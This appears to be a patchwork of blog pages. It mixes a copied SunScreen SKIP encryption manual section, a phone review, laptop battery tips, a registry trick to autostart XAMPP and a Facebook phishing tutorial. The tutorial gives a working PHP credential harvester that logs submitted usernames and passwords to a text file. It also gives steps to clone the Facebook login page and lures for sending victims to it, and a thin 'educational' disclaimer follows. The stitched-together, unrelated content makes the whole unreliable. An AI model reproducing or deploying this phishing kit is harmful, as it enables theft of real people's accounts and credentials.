Encryption and Decryption

 Encryption is the process by which a readable message is converted to an unreadable form to prevent unauthorized parties from reading it. Decryption is the process of converting an encrypted message back to its original (readable) format. The original message is called the plaintext message. The encrypted message is called the ciphertext message.

Digital encryption algorithms work by manipulating the digital content of a plaintext message mathematically, using an encryption algorithm and a digital key to produce a ciphertext version of the message. The sender and recipient can communicate securely if the sender and recipient are the only ones who know the key.

Shared Key and Public Key Encryption

SKIP uses a combination of shared key cryptography and public key cryptography to protect messages sent between hosts. SKIP hosts use shared traffic keys that change frequently to encrypt data sent from one host to another. To protect these shared traffic keys, SKIP hosts use the public key to calculate an implicit shared secret, which they use to encrypt the shared traffic keys, keeping network communication secure.

Shared Key Encryption

Shared key encryption uses one key to encrypt and decrypt messages. For shared key cryptography to work, the sender and the recipient of a message must both have the same key, which they must keep secret from everybody else. The sender uses the shared key to encrypt a message, shown in the following figure, and then sends the ciphertext message to the recipient.

Figure B-1 Sender Uses Key to Encrypt Plaintext to Ciphertext

When the ciphertext message arrives, the recipient uses the identical shared key to decrypt the message, shown in the following figure.

Figure B-2 Recipient Uses Key to Decrypt Ciphertext to Plaintext

Shared key encryption/decryption is relatively fast. However, since anyone with the shared key can decrypt the information, shared key encryption requires that only the sender and recipient have access to the shared key. SunScreen SKIP uses shared key algorithms to encrypt packets sent between hosts. SunScreen SKIP protects the security of encrypted information by generating new traffic keys frequently during a communication session, making acquisition of any one traffic key useless.

Public Key Encryption

Public key encryption uses a pair of complementary keys (a public key and a private key) to encrypt and decrypt messages, as shown in the following figure. The two keys are mathematically related such that a message encoded with one key can only be decoded with the other key. Although a user's public and private keys are mathematically related, knowledge of a public key does not make it possible to calculate the corresponding private key.

Figure B-3 Complementary Public and Private Keys

In public key encryption systems, users make their public key available to anyone and keep their private key secret. When one user wants to send a private message to another user, the sender looks up the recipient's public key and uses it to encrypt a message, as shown in the following figure, before sending it to the recipient.

Figure B-4 Sender Uses Recipient's Public Key to Encrypt Message

When the encrypted message arrives, the recipient uses his or her private key to decrypt the message, shown in the following figure. Because the recipient's private key is known only to the recipient, both the sender and recipient can safely assume that no one other than the recipient can read the message.

Figure B-5 Recipient Uses Private Key to Decrypt Message

Public key encryption algorithms are mathematically more complex than shared key encryption algorithms. As a result, public key encryption is significantly slower than shared key encryption. Consequently, SunScreen SKIP uses Diffie-Hellman key pairs (described in the next section) to create a shared secret between two users, and then uses shared key encryption to encrypt traffic traveling between the two hosts.

Diffie-Hellman Key Exchange

The Diffie-Hellman key exchange algorithm, which is named after its inventors, solves the problem of securely distributing keys by removing the need to transmit secret keys. When two hosts wish to use the Diffie-Hellman algorithm to exchange keys, they agree to use the same numerical values for the key basis (g) and modulus (p). Each host generates a large (512-, 1024-, or 2048-bit) random number (x) as a private key, and then uses this private key to generate a public key g^x mod p.

Once a user's private and public keys have been calculated, SunScreen SKIP creates the user's public certificate. This certificate contains the public key value, the g and p values used to compute the public key, and other information, such as the period for which the certificate is valid.

SunScreen SKIP hosts exchange their public certificates with one another freely. When two hosts wish to communicate securely, each host calculates a mutually authenticated shared secret based solely on knowledge of its private key and the other host's public key.

For example, host I would select a random number i as a private key and then generate a public key gⁱ mod p. Similarly, host J would select a random number j as a private key and then generate a public key gj mod p. The two hosts then exchange their public keys over secure or insecure links. Host I raises J's public key (g^j mod p) to the power of its private key i, yielding (g^j)ⁱ mod p or g^ji mod p. Host J raises I's public key (gⁱ mod p) to the power of its private key j, yielding (gⁱ)^j mod p or g^ij mod p. Consequently, hosts I and J can derive a mutually authenticated long-term secret g^ij mod p implicitly (without explicit communication). Since no one other than I and J have access to their private keys, no one other than I and J can compute g^ij mod p.

The two hosts then take the low-order bits of g^ij mod p to derive a pairwise master key K_ij. K_ij is an implicit shared master key that does not need to be sent in any packet or negotiated out of band.

In theory, the two hosts could use their shared master key K_ij to encrypt messages. However, doing so might expose K_ij to analysis and eventual decryption. Instead, SunScreen SKIP uses a rapidly-changing series of traffic keys to encrypt messages traveling between the two hosts, and uses a modified version of K_ij to encrypt these traffic keys. See "Perfect Forward Secrecy", below, for more information.

Perfect Forward Secrecy

Perfect forward secrecy substitutes a clock-based master key for the long-term Diffie-Hellman shared secret K_ij. Using a clock-based master key means that the long-term secret K_ij is never directly exposed to third parties, making it less vulnerable to cryptanalysis. Another feature of perfect forward secrecy is that it prevents coarse-grain playback of traffic. Once the clock-based master key has been updated, traffic encrypted or authenticated with the help of old keys will be rejected by SKIP.

SKIP uses the long-term secret key K_ij and the date/time value n to create a time-based shared secret key K_ijn.

Kijn = h(Kij, n)

where h is a pseudo-random function such as MD5. SKIP uses the current time and date clock (actually, the number of hours since 1977) to generate n, which changes every hour. Consequently, hosts using SunScreen SKIP must verify that the date, time, and time zone settings on their systems are synchronized to ensure that they are using the same n in their master key calculations.

This time-based shared secret key is used to encrypt traffic keys. Since I and J can calculate K_ij based on their implicitly authenticated shared secret, the two computers can calculate the same value for K_ijn if their system clocks are synchronized.

---

Note -

SKIP relies on the system clock value to calculate time-based shared secrets. Consequently, hosts using SunScreen SKIP must verify that the date, time, and time zone settings on their systems are correct to ensure that they are using the same n in their master key calculations. Users should never change the time, date, or time zone setting on their computer while using SunScreen SKIP.

---

When I wants to send a secure message to J, I uses a randomly generated traffic key K_p to encrypt the contents of the message. The traffic key K_p is in turn encrypted using K_ijn. SunScreen SKIP then constructs a series of packets, each containing the IP header information (in cleartext) needed to route the packet to its destination, the traffic key encrypted with the time-based shared secret K_ijn, and the message data encrypted with the traffic key K_p. The following figure shows an encrypted IP packet, using this two-step encryption procedure.

Figure B-6 Encrypted IP Packet

When the destination host receives this encrypted packet, it looks up the sender's certificate. Using the long-term secret key K_ij and the counter value n (which is based on the current date and time), the destination host computes the same K_ijn value used by the sender. Using K_ijn, the destination host decrypts the traffic key K_p, and then uses the traffic key to decrypt the packet data.

Since K_ijn can be cached for efficiency, SKIP can change traffic keys very rapidly without incurring the computational overhead of a public key operation. SKIP changes traffic keys after a key has been idle for a user-specified number of seconds (30 seconds by default) or after a key has been used to encrypt a user-specified amount of data (512K by default).

Encryption Algorithms

The following table lists the traffic encryption algorithms supported by SKIP.

Table B-1 Encryption Algorithms

Encryption Algorithm	Description	Efficiency	Security
DES-CBC	DES uses cipher block chaining (CBC) and a 56-bit key to encrypt 64-bit blocks of plaintext in multiple iterations.	Moderate	Excellent
DES-EDE-K3	DES-EDE-K3 (triple DES) uses three encryption operations and cipher block chaining (CBC) and a 56-bit key to encrypt 64-bit blocks of plaintext in multiple iterations.	Poor	Excellent
Safer-128SK-CBC	Safer uses two 64-bit subkeys and cipher block chaining to encrypt variable-length blocks of plaintext.	Good	Excellent
RC2-40 (Restricted to 32-bit mode only for SKIP V1.5.1)	RC-2 uses cipher block chaining (CBC) and a variable-size key to encrypt 64-bit blocks of plaintext.	Good	Good
RC4-128	RC-4 uses a 128-bit key to encrypt data in a continuous stream.	Excellent	Excellent
RC4-40	RC-4 uses a 40-bit key to encrypt data in a continuous stream.	Excellent	Poor

SKIP Certificates

SKIP certificates are the means by which a user distributes public key information. A SKIP certificate is a digital document that contains a user's Distinguished Name, the public key associated with that Distinguished Name, and the time interval for which the certificate is valid. You can distribute your public certificate to other users, who extract and use your public key to calculate a unique shared secret for encrypting communications between you. Users can distribute their certificates freely to other SKIP users on diskette, through a certificate server, or over a network.

Figure B-7 SKIP Certificate Contents

SKIP certificates can be signed or unsigned:

• Signed SKIP certificates (RSA certificates) must be obtained from a Certification Authority, which is an entity trusted to create and assign SKIP certificates. In addition to the information described above, a signed certificate contains the name of the certification authority responsible for issuing the certificate and the MD5 hash of the certificate. The CA signs the certificate by encrypting the hash with the CA's private key. The CA's digital signature lets anyone who receives the certificate validate its contents and verify that an unauthorized user is not impersonating you.

  You can store signed certificates in directory servers, transmit them by means of non-secure message exchanges, or distribute them on diskette. For information on how to obtain signed SKIP certificates, contact carequest@sun.com.

• Unsigned SKIP certificates (unsigned Diffie-Hellman (UDH) certificates) are generated on demand by the user. A user's unsigned certificate can be distributed through secure out-of-band channels or through certificate discovery (which is described on "Certificate Discovery"). Unsigned certificates can offer several advantages over signed certificates:

  • A user generates a private key when he or she generates a public certificate. This private key never leaves the user's machine, meaning that a network administrator does not need to order, distribute, or protect key diskettes.

  • Since UDH certificates are not registered by a certification authority, they do not need to be formally revoked. If a user or administrator suspects that a key has been compromised, a new key/certificate can be generated and the new certificate can be distributed to other users.

The decision whether to use a signed or unsigned certificate depends on the type of hosts with which you want to exchange encrypted traffic. In general, you must use a signed certificate to communicate securely with a host using a signed certificate, and you must use an unsigned certificate to communicate securely with a host using a UDH certificate. Both certificates must use keys of the same length and use the same values for key calculation.

Certificate Discovery

Certificate discovery lets a host running SunScreen SKIP retrieve a public (X.509 or UDH) certificate from another SKIP host over a network or serial connection. Certificate discovery is an alternative to direct installation of certificates.

Certificate discovery works as follows:

1. You verify that certificate discovery is enabled on your computer and on the remote host.

2. You obtain the identifier and name space of the certificate you want to discover from a remote user by means of a channel that lets you authenticate the other user's identity. For example, you might call a user with whom you want to send encrypted traffic to exchange certificate identifiers and name spaces, relying on recognition of the other user's voice to authenticate the user's identity.

3. You enter the identifier of the remote certificate in skiptool.

4. Your computer sends a Certificate Discovery Protocol request to the remote computer in clear text on UDP port 1640, asking for a specific certificate using the designated name space. The remote computer sends back the requested information in clear text on UDP port 1641.

5. SunScreen SKIP validates the certificate. For signed certificates, SunScreen SKIP uses the Certifying Authority's public key to decrypt the certificate digest, creates its own MD5 digest of the public certificate, and compares the result. For unsigned certificates, SunScreen SKIP creates an MD5 hash of the certificate's public key and compares it to the certificate's name.

6. SunScreen SKIP adds the certificate for the remote host to its certificate database.

7. SunScreen SKIP uses the public key information contained in the remote host's certificate to generate a unique shared secret.

Name Space Identifiers

Name space identifiers (NSIDs) identify the type of keys being used. SunScreen EFS 2.0 supports the following NSIDs:

• NSID 0, which specifies that the IP address of the host is the key identifier for the host's X.509 certificate. Using NSID 0 results in a small improvement in encryption/decryption efficiency, since SKIP does not need to include a key identifier in each packet.

• NSID 1, which is the IPv4 address assigned to the X.509 certificate by a certification authority. This IP address does not correspond to the IP address used by your computer. Rather, it is an eight-byte hexadecimal number assigned to the certificate by the certification authority to bind a unique Distinguished Name to the certificate contents. For example, a SunCA certificate might use 0a000101 (which translates to 10.0.1.1 in IP address notation) as a key identifier

• NSID 8, which is the MD5 hash of the certificate's Diffie-Hellman public key.

SKIP Tunnels

A SKIP tunnel is a logical connection between your computer and another host that accepts encrypted messages on behalf of a remote host. Before your computer sends a message through a SKIP tunnel, it encrypts each packet and adds an IP header that specifies the security proxy as its destination. The security proxy decrypts each packet and uses the IP header of the decrypted packet to route the packet to its actual destination.

SKIP tunnels offer several advantages over endpoint-to-endpoint encryption:

• Centralized decryption - By directing network traffic through a SKIP tunnel to a special gateway, your site can centralize encryption and decryption in a single machine. Consequently, a site would not need to install security software on every host.

• Topology hiding - The tunnel address field contains the IP address of the security proxy; the IP address of the packet's actual destination is encrypted along with the rest of the packet. Consequently, an unauthorized user cannot glean information about a site's topology from a captured packet.

• Prevention of packet fragmentation - When using endpoint-to-endpoint encryption, packets may become fragmented as they travel from one site to another. If this occurs, the packet fragments may be routed to different gateways at a site. Since each gateway would receive only part of the packet, the packet could not be decrypted, making it impossible to forward the packet contents to the destination host. By specifying the security proxy to which all packets (and packet fragments) should be delivered, you ensure that the security proxy will receive the information it needs to route packets to destination hosts reliably.

Review : Samsung Galaxy Grand Prime

Samsung Galaxy Grand Prime

1. 8 MP Primary Camera
2. 5-inch Touchscreen
3. Android v4.4 (KitKat) OS
4. 5 MP Secondary Camera
5. Expandable Storage Capacity of 64 GB
6. Dual Sim (GSM + GSM)
7. 1.2 GHz Quad Core Processor 
8. Price : Rs. 15000/-

          Hi, I bought this mobile from nearby samsung mobile store (Miracle mobile Shop, Ghatkopar). If you are a android lover then plzzzz go for Grand Prime, its really Superb/ Awesome mobile to buy. If you are looking within 15000/- budget buy it now , every thing is perfect in this phone. 5 MP Secondary camera. You can say its a SELFIE phone...!!!!
         I am happy with this phone do not wait go to store and buy quickly.. product is too good no doubt, but you can buy this phone at normal shop around 15000..Flipkart's rate is too high..!!

Laptop Battery Care..!!

 

Should I remove the battery when A/C is plugged in?

Many laptop users have this question and we will answer it right now:  The answer is: YES and NO, it depends on the situation.

Having a battery fully charged and the laptop plugged in is not harmful, because as soon as the charge level reaches 100% the battery stops receiving charging energy and this energy is bypassed directly to the power supply system of the laptop.

However there's a disadvantage in keeping the battery in its socket when the laptop is plugged in, but only if it's currently suffering from excessive heating caused by the laptop hardware.

1. So, In a normal usage, if the laptop doesn't get too hot (CPU and Hard Disk around 40ºC to 50ºC) the battery should remain in the laptop socket;
2. In an intensive usage which leads to a large amount of heat produced (i.e. Games, temperatures above 60ºC) the battery should be removed from the socket in order to prevent unwanted heating. The heat, among the fact that it has 100% of charge, is the great enemy of the lithium battery and not the plug, as many might think so. 
3. Full battery discharges (until laptop power shutdown, 0%) should be avoided, because this stresses the battery a lot and can even damage it. It's recommended to perform partial discharges to capacity levels of 20~30% and frequent charges, instead of performing a full discharging followed by a full charging.
4. Laptop batteries contain a capacity gauge that allows us to know the exact amount of energy stored. However, due to the charging/discharging cycles, this sensor tends to be inaccurate overtime. Some laptops include in their BIOS, tools to recalibrate this battery gauge, which is nothing more than a full discharge followed by a full charge.
   So to calibrate the gauge, it should be performed, in every 30 discharge cycles, a full discharge non-stop , followed by a also, non-stop, full charge.
   An inaccurate gauge can lead to the fact that the the battery capacity values are are wrong. The battery may report that it still has 10% of capacity when in fact it has a much lower value, and this causes the computer to shutdown unexpectedly.
   Discharge (or charge) cycles consist of using all that battery charge (100%) but not necessarily all at once.
   For example, you can use the laptop for some minutes in a day, using half its capacity e then fully charge it. If you did the same thing in the next day, it would be counted a discharge cycle and not two, so it may take several days until a full discharge cycle is completed.

Facebook username password hacking ...!!!! protect your Account from hackers..!!

Hi, this is kushal kolekar. Today we are going to see how many hackers hacks facebook accounts by phishing.

Phishing : It is a hacking technique in which the hacker can get your sensitive information's like username, password, email, credit card information, bank account information's. In short its a "Scamming method used to get personal information". It is only you who provide them your information. they may ask you some questions, may send you some webpages (fake) which may look like original pages (facebook login page, Gmail, etc.) and after you filling these pages they may redirect your information to other destination where they want.

Now lets see how actually it works and how to recognize phishing email messages, links.
Phishing setps:
we need three files a) facebook.php (fack fb page) b) login.php (script) c) password.txt



1) open www.facebook.com Login page. Right click on it and click on view page source.

2) It will get you to another window where you will find source code of that page. copy all content and save in another text file and save as facebook.php. before saving it we have to altar its code for providing a destination to take the victims  username and password.

              As shown in above image, < form id="login_form" action ="      " method="post" ......>

here in action we have to pass the name of the php script file.  Then save this page as facebook.php and upload it to your website file manager.

3) Login.php : It is a php script file. Create a new txt file. and paste following code in it



<?php
header("Location: http://www.facebook.com");
$kushal = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value)
 {
   fwrite($kushal, $variable);
   fwrite($kushal, "=");
   fwrite($kushal, $value);
   fwrite($kushal, "\r\n");
  }
 fwrite($kushal, "\r\n");
 fwrite("=======================");
 fclose($kushal);
 exit;
?>

Save this file as login.php. and upload this too in your file manager.



3)  In above code 3rd line. "password.txt" is the file where we are going to take victims username and password.

4) Now we have to send this facebook.php page to victim via many ways like make advertisement and ask them to like their page on Facebook click on following link. or sent a email as a fb admin to alert user that your account is deactivated or any other reason and click on following link to get activated. or we can make a hyperlink to any image, text and send it to the victim to divert them to our fake page.

5) If victim click on you link. they will directed to the the facebook login page which is fake created by us (facebook.php).

6) Now victim will assume that this is a facebook login page. and he will put his username and password in textfields  as usual. and as soon as he will click on login. whatever writen in usename and password TextFields that will get diverted to our password.txt file.

Phishing mail:

How to protect your account from phishing.

1)  Whenever your login to your facebook account. Check the URL it should be www.facebook.com     it should not be a link to a login page as shown in following image or it should not be a    www.faceb00k.com, www.faecbook.com..
    

2) do not login from any others computer it may possible, that computer may have installed keyloggers , so whatever you will type your keystroke will be tracked and history will be maintain in a text file. so attacker can easily identify your username and password.

3) Do not reply to the email asking to update facebook account.




[ Note : This article is for educational purpose and to have an idea how to protect fb account. if any missuses or any buddy use it to hack others password. Blog will not be responsible for that. ]


Computer Tricks & Tips 
Kushal K. Kolekar

Make XAMPP to Run automatically on start up..!!!

Latest Trick  JMinD_FreaK J
 
 This SEM  T.E students are busy with their  Mini-project of Web Designing, for this you must need to run Local host (xampp) on your systems. Every time you starts your machine you need to  find xamp shortcut then you need to start Apache server and SQL server manually by clickin on start option in Xampp.
if you want to avoid this manual settings and if you want your Xampp(localhost ) to be  start automatically on windows start up

Follow the Steps:-
1) First you need to configure your xampp setting. RUN XAMPP and follow image.

2) Now, to run any exe at the start up. Windows need to see the Run log. Exe file present in the RUN.log windows runs those files.
3) So to start Xampp. We have to make its log in RUN.
4) windows + R (i.e Open RUN) type REGEDIT >HKEY_LOCAL_MACHINE>SOFTWARE>
     MICROSOFT>WINDOWS>CURRENT VISION>RUN.

                                         



5)Now right click in window> NEW>STRING VALUE or alt+ E > NEW>STRING VALUE. it will add new file in list. name it by XAMPP.
6) Right Click on this File. Select MODIFY> in String Data field type path of xampp_start.exe
c:\xampp\xampp_start.exe > click on ok.

7) Now LOG OFF . Again on LOG ON you will find your Xampp started automatically.
8) It will now even show any xampp window running or minimized.  Check it by running  any PHP file in browser.



Computer Tricks & Tips